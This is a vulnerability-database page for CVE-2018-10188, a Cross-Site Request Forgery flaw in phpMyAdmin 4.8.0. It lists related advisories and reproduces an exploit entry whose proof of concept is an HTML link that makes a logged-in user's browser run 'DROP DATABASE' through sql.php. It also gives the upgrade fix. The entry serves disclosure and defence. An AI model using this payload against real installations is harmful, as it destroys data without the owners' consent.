| Reporter | Title | Published | Views | Family All 26 |
|---|---|---|---|---|
| phpMyAdmin 4.8.0 / 4.8.0-1 - Cross-Site Request Forgery Vulnerability | 23 Apr 201800:00 | – | zdt | |
| CVE-2018-10188 | 19 Apr 201814:00 | – | alpinelinux | |
| CVE-2018-10188 | 25 Apr 202421:25 | – | circl | |
| phpMyAdmin Cross-Site Request Forgery Vulnerability (CNVD-2018-09386) | 11 May 201800:00 | – | cnvd | |
| CVE-2018-10188 | 19 Apr 201814:00 | – | cve | |
| CVE-2018-10188 | 19 Apr 201814:00 | – | cvelist | |
| CVE-2018-10188 | 19 Apr 201814:00 | – | debiancve | |
| EUVD-2022-5295 | 3 Oct 202520:07 | – | euvd | |
| phpMyAdmin 4.8.0 4.8.0-1 - Cross-Site Request Forgery | 23 Apr 201800:00 | – | exploitpack | |
| phpMyAdmin CSRF vulnerability allowing arbitrary SQL execution | 14 May 202203:22 | – | github |
# Exploit Title: phpMyAdmin 4.8.0 < 4.8.0-1 - Cross-Site Request Forgery
# Date: 2018-04-20
# Software Link: https://www.phpmyadmin.net/
# Author: @revengsh & @0x00FI
# CVE: CVE-2018-10188
# Category: Webapps
#1. Description
#The vulnerability exists due to failure in the "/sql.php" script to properly verify the source of HTTP request.
#This Cross-Site Request Forgery (CSRF) allows an attacker to execute arbitrary SQL statement by sending a malicious request to a logged in user.
#2. Proof of Concept: This example sends HTTP GET crafted request in order to drop the specified database.
<html>
<body>
<a href="http://[HOST]/phpmyadmin/sql.php?sql_query=DROP+DATABASE+[DBNAME]">
Drop database
</a>
</body>
</html>
#3. Solution: Upgrade to phpMyAdmin 4.8.0-1 or newer.
#4. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10188Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation